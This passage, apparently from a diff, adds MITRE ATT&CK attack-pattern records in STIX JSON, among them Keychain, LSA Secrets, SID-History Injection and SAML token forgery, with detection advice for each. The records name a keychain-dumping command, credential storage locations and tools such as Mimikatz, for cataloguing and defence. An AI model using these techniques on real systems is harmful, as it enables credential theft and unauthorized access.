+ "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Where applicable, inspect important file hashes, locations, and modifications for suspicious/unexpected values.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_impact_type": [ + "Integrity" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292", + "created": "2020-03-02T14:22:24.410Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1565/001", + "external_id": "T1565.001" + }, + { + "source_name": "DOJ Lazarus Sony 2018", + "description": "Department of Justice. (2018, September 6). Criminal Complaint - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.", + "url": "https://www.justice.gov/opa/press-release/file/1092091/download" + }, + { + "source_name": "FireEye APT38 Oct 2018", + "description": "FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018.", + "url": "https://content.fireeye.com/apt/rpt-apt38" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T21:01:48.643Z", + "name": "Password Cracking", + "description": "Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) can be used to obtain password hashes, this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) is not an option. Further, adversaries may leverage [Data from Configuration Repository](https://attack.mitre.org/techniques/T1602) in order to obtain hashed credentials for network devices.(Citation: US-CERT-TA18-106A) \n\nTechniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network.(Citation: Wikipedia Password cracking) The resulting plaintext password resulting from a successfully cracked hash may be used to log into systems, resources, and services in which the account has access.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Mohamed Kmal" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network. Consider focusing efforts on detecting other adversary behavior used to acquire credential materials, such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Office 365", + "Azure AD", + "Network" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--1d24cdee-9ea2-4189-b08e-af110bf2435d", + "created": "2020-02-11T18:38:56.197Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1110/002", + "external_id": "T1110.002" + }, + { + "source_name": "US-CERT-TA18-106A", + "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-106A" + }, + { + "source_name": "Wikipedia Password cracking", + "description": "Wikipedia. (n.d.). Password cracking. Retrieved December 23, 2015.", + "url": "https://en.wikipedia.org/wiki/Password_cracking" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "SID-History Injection", + "description": "The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).\n\nAdversaries may use this mechanism for privilege escalation. With Domain Administrator (or equivalent) rights, harvested or well-known SID values (Citation: Microsoft Well Known SIDs Jun 2017) may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as [Remote Services](https://attack.mitre.org/techniques/T1021), [Windows Admin Shares](https://attack.mitre.org/techniques/T1077), or [Windows Remote Management](https://attack.mitre.org/techniques/T1028).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Vincent Le Toux", + "Alain Homewood, Insomnia Security" + ], + "x_mitre_detection": "Examine data in user’s SID-History attributes using the PowerShell Get-ADUser Cmdlet (Citation: Microsoft Get-ADUser), especially users who have SID-History values from the same domain. (Citation: AdSecurity SID History Sept 2015)\n\nMonitor Account Management events on Domain Controllers for successful and failed changes to SID-History. (Citation: AdSecurity SID History Sept 2015) (Citation: Microsoft DsAddSidHistory)\n\nMonitor Windows API calls to the DsAddSidHistory function. (Citation: Microsoft DsAddSidHistory)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator", + "SYSTEM" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--1df0326d-2fbc-4d08-a16b-48365f1e742d", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1178", + "external_id": "T1178" + }, + { + "source_name": "Microsoft SID", + "description": "Microsoft. (n.d.). Security Identifiers. Retrieved November 30, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/aa379571.aspx" + }, + { + "source_name": "Microsoft SID-History Attribute", + "description": "Microsoft. (n.d.). Active Directory Schema - SID-History attribute. Retrieved November 30, 2017.", + "url": "https://msdn.microsoft.com/library/ms679833.aspx" + }, + { + "source_name": "Microsoft Well Known SIDs Jun 2017", + "description": "Microsoft. (2017, June 23). Well-known security identifiers in Windows operating systems. Retrieved November 30, 2017.", + "url": "https://support.microsoft.com/help/243330/well-known-security-identifiers-in-windows-operating-systems" + }, + { + "source_name": "Microsoft Get-ADUser", + "description": "Microsoft. (n.d.). Active Directory Cmdlets - Get-ADUser. Retrieved November 30, 2017.", + "url": "https://technet.microsoft.com/library/ee617241.aspx" + }, + { + "source_name": "AdSecurity SID History Sept 2015", + "description": "Metcalf, S. (2015, September 19). Sneaky Active Directory Persistence #14: SID History. Retrieved November 30, 2017.", + "url": "https://adsecurity.org/?p=1772" + }, + { + "source_name": "Microsoft DsAddSidHistory", + "description": "Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November 30, 2017.", + "url": "https://msdn.microsoft.com/library/ms677982.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "Local Email Collection", + "description": "Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.\n\nOutlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.(Citation: Outlook File Sizes) IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in `C:\\Users\\\\Documents\\Outlook Files` or `C:\\Users\\\\AppData\\Local\\Microsoft\\Outlook`.(Citation: Microsoft Outlook Files)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitor processes and command-line arguments for actions that could be taken to gather local email files. Monitor for unusual processes accessing local email files. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--1e9eb839-294b-48cc-b0d3-c45555a2a004", + "created": "2020-02-19T18:46:06.098Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1114/001", + "external_id": "T1114.001" + }, + { + "source_name": "Outlook File Sizes", + "description": "N. O'Bryan. (2018, May 30). Managing Outlook Cached Mode and OST File Sizes. Retrieved February 19, 2020.", + "url": "https://practical365.com/clients/office-365-proplus/outlook-cached-mode-ost-file-sizes/" + }, + { + "source_name": "Microsoft Outlook Files", + "description": "Microsoft. (n.d.). Introduction to Outlook Data Files (.pst and .ost). Retrieved February 19, 2020.", + "url": "https://support.office.com/en-us/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Keychain", + "description": "Adversaries may acquire credentials from Keychain. Keychain (or Keychain Services) is the macOS credential management system that stores account names, passwords, private keys, certificates, sensitive application data, payment data, and secure notes. There are three types of Keychains: Login Keychain, System Keychain, and Local Items (iCloud) Keychain. The default Keychain is the Login Keychain, which stores user passwords and information. The System Keychain stores items accessed by the operating system, such as items shared among users on a host. The Local Items (iCloud) Keychain is used for items synced with Apple’s iCloud service. \n\nKeychains can be viewed and edited through the Keychain Access application or using the command-line utility security. Keychain files are located in ~/Library/Keychains/, /Library/Keychains/, and /Network/Library/Keychains/.(Citation: Keychain Services Apple)(Citation: Keychain Decryption Passware)(Citation: OSX Keychain Schaumann)\n\nAdversaries may gather user credentials from Keychain storage/memory. For example, the command security dump-keychain –d will dump all Login Keychain credentials from ~/Library/Keychains/login.keychain-db. Adversaries may also directly read Login Keychain credentials from the ~/Library/Keychains/login.keychain file. Both methods require a password, where the default password for the Login Keychain is the current user’s password to login to the macOS host.(Citation: External to DA, the OS X Way)(Citation: Empire Keychain Decrypt) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Unlocking the keychain and using passwords from it is a very common process, so there is likely to be a lot of noise in any detection technique. Monitoring of system calls to the keychain can help determine if there is a suspicious process trying to access it.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3", + "created": "2020-02-12T18:55:24.728Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1555/001", + "external_id": "T1555.001" + }, + { + "source_name": "External to DA, the OS X Way", + "description": "Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to DA, the OS X Way. Retrieved July 3, 2017.", + "url": "http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way" + }, + { + "source_name": "Keychain Services Apple", + "description": "Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.", + "url": "https://developer.apple.com/documentation/security/keychain_services" + }, + { + "source_name": "Empire Keychain Decrypt", + "description": "Empire. (2018, March 8). Empire keychaindump_decrypt Module. Retrieved April 14, 2022.", + "url": "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py" + }, + { + "source_name": "OSX Keychain Schaumann", + "description": "Jan Schaumann. (2015, November 5). Using the OS X Keychain to store and retrieve passwords. Retrieved March 31, 2022.", + "url": "https://www.netmeister.org/blog/keychain-passwords.html" + }, + { + "source_name": "Keychain Decryption Passware", + "description": "Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption. Retrieved April 13, 2022.", + "url": "https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-16T12:26:07.945Z", + "name": "Boot or Logon Autostart Execution", + "description": "Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.\n\nSince some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for additions or modifications of mechanisms that could be used to trigger autostart execution, such as relevant additions to the Registry. Look for changes that are not correlated with known updates, patches, or other planned administrative activity. Tools such as Sysinternals Autoruns may also be used to detect system autostart configuration changes that could be attempts at persistence.(Citation: TechNet Autoruns) Changes to some autostart configuration settings may happen under normal conditions when legitimate software is installed. \n\nSuspicious program execution as autostart programs may show up as outlier processes that have not been seen before when compared against historical data.To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n\nMonitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Look for abnormal process behavior that may be due to a process loading a malicious DLL.\n\nMonitor for abnormal usage of utilities and command-line parameters involved in kernel modification or driver installation.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User", + "Administrator", + "root" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", + "created": "2020-01-23T17:46:59.535Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1547", + "external_id": "T1547" + }, + { + "source_name": "Cylance Reg Persistence Sept 2013", + "description": "Langendorf, S. (2013, September 24). Windows Registry Persistence, Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018.", + "url": "https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order" + }, + { + "source_name": "MSDN Authentication Packages", + "description": "Microsoft. (n.d.). Authentication Packages. Retrieved March 1, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx" + }, + { + "source_name": "Microsoft Run Key", + "description": "Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November 12, 2014.", + "url": "http://msdn.microsoft.com/en-us/library/aa376977" + }, + { + "source_name": "Microsoft TimeProvider", + "description": "Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.", + "url": "https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx" + }, + { + "source_name": "Linux Kernel Programming", + "description": "Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel Module Programming Guide. Retrieved April 6, 2018.", + "url": "https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf" + }, + { + "source_name": "TechNet Autoruns", + "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", + "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "LSA Secrets", + "description": "Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at HKEY_LOCAL_MACHINE\\SECURITY\\Policy\\Secrets. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)\n\n[Reg](https://attack.mitre.org/software/S0075) can be used to extract from the Registry. [Mimikatz](https://attack.mitre.org/software/S0002) can be used to extract secrets from memory.(Citation: ired Dumping LSA Secrets)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Ed Williams, Trustwave, SpiderLabs" + ], + "x_mitre_detection": "Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "SYSTEM" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc", + "created": "2020-02-21T16:22:09.493Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1003/004", + "external_id": "T1003.004" + }, + { + "source_name": "Passcape LSA Secrets", + "description": "Passcape. (n.d.). Windows LSA secrets. Retrieved February 21, 2020.", + "url": "https://www.passcape.com/index.php?section=docsys&cmd=details&id=23" + }, + { + "source_name": "Microsoft AD Admin Tier Model", + "description": "Microsoft. (2019, February 14). Active Directory administrative tier model. Retrieved February 21, 2020.", + "url": "https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN" + }, + { + "source_name": "Tilbury Windows Credentials", + "description": "Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack, Mitigation, Defense. Retrieved February 21, 2020.", + "url": "https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf" + }, + { + "source_name": "ired Dumping LSA Secrets", + "description": "Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets. Retrieved February 21, 2020.", + "url": "https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets" + }, + { + "source_name": "Powersploit", + "description": "PowerSploit. (n.d.). Retrieved December 4, 2014.", + "url": "https://github.com/mattifestation/PowerSploit" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Port Monitors", + "description": "A port monitor can be set through the (Citation: AddMonitor) API call to set a DLL to be loaded at startup. (Citation: AddMonitor) This DLL can be located in C:\\Windows\\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions. (Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors. \n\nThe Registry key contains entries for the following:\n\n* Local Port\n* Standard TCP/IP Port\n* USB Monitor\n* WSD Port\n\nAdversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Stefan Kanthak", + "Travis Smith, Tripwire" + ], + "x_mitre_detection": "* Monitor process API calls to (Citation: AddMonitor).\n* Monitor DLLs that are loaded by spoolsv.exe for DLLs that are abnormal.\n* New DLLs written to the System32 directory that do not correlate with known good software or patching may be suspicious.\n* Monitor Registry writes to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors.\n* Run the Autoruns utility, which checks for this Registry key as a persistence mechanism (Citation: TechNet Autoruns)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_effective_permissions": [ + "SYSTEM" + ], + "x_mitre_permissions_required": [ + "Administrator", + "SYSTEM" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--1f47e2fd-fa77-4f2f-88ee-e85df308f125", + "created": "2017-05-31T21:30:26.057Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1013", + "external_id": "T1013" + }, + { + "source_name": "AddMonitor", + "description": "Microsoft. (n.d.). AddMonitor function. Retrieved November 12, 2014.", + "url": "http://msdn.microsoft.com/en-us/library/dd183341" + }, + { + "source_name": "Bloxham", + "description": "Bloxham, B. (n.d.). Getting Windows to Play with Itself [PowerPoint slides]. Retrieved November 12, 2014.", + "url": "https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf" + }, + { + "source_name": "TechNet Autoruns", + "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", + "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "Weaken Encryption", + "description": "Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)\n\nEncryption can be used to protect transmitted network traffic to maintain its confidentiality (protect against unauthorized disclosure) and integrity (protect against unauthorized changes). Encryption ciphers are used to convert a plaintext message to ciphertext and can be computationally intensive to decipher without the associated decryption key. Typically, longer keys increase the cost of cryptanalysis, or decryption without the key.\n\nAdversaries can compromise and manipulate devices that perform encryption of network traffic. For example, through behaviors such as [Modify System Image](https://attack.mitre.org/techniques/T1601), [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001), and [Disable Crypto Hardware](https://attack.mitre.org/techniques/T1600/002), an adversary can negatively effect and/or eliminate a device’s ability to securely encrypt network traffic. This poses a greater risk of unauthorized disclosure and may help facilitate data manipulation, Credential Access, or Collection efforts. (Citation: Cisco Blog Legacy Device Attacks)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "There is no documented method for defenders to directly identify behaviors that weaken encryption. Detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601). Some detection methods require vendor support to aid in investigation.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Network" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Encryption" + ], + "x_mitre_permissions_required": [ + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--1f9012ef-1e10-4e48-915e-e03563435fe8", + "created": "2020-10-19T18:47:08.759Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1600", + "external_id": "T1600" + }, + { + "source_name": "Cisco Synful Knock Evolution", + "description": "Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020.", + "url": "https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices" + }, + { + "source_name": "Cisco Blog Legacy Device Attacks", + "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.", + "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-03-01T17:55:56.116Z", + "name": "SAML Tokens", + "description": "An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the NotOnOrAfter value of the conditions ... element in a token. This value can be changed using the AccessTokenLifetime in a LifetimeTokenPolicy.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)\n\nAn adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.\n\nAn adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Blake Strom, Microsoft 365 Defender", + "Oleg Kolesnikov, Securonix", + "Jack Burns, HubSpot" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "This technique may be difficult to detect as SAML tokens are signed by a trusted certificate. The forging process may not be detectable since it is likely to happen outside of a defender's visibility, but subsequent usage of the forged token may be seen. Monitor for anomalous logins using SAML tokens created by a compromised or adversary generated token-signing certificate. These logins may occur on any on-premises resources as well as from any cloud environment that trusts the certificate.(Citation: Microsoft SolarWinds Customer Guidance) Search for logins to service providers using SAML SSO which do not have corresponding 4769, 1200, and 1202 events in the Domain.(Citation: Sygnia Golden SAML)\n\nConsider modifying SAML responses to include custom elements for each service provider. Monitor these custom elements in service provider access logs to detect any anomalous requests.(Citation: Sygnia Golden SAML)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Azure AD", + "SaaS", + "Windows", + "Office 365", + "Google Workspace", + "IaaS" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--1f9c2bae-b441-4f66-a8af-b65946ee72f2", + "created": "2020-12-17T15:24:12.240Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1606/002", + "external_id": "T1606.002" + }, + { + "source_name": "Microsoft SolarWinds Steps", + "description": 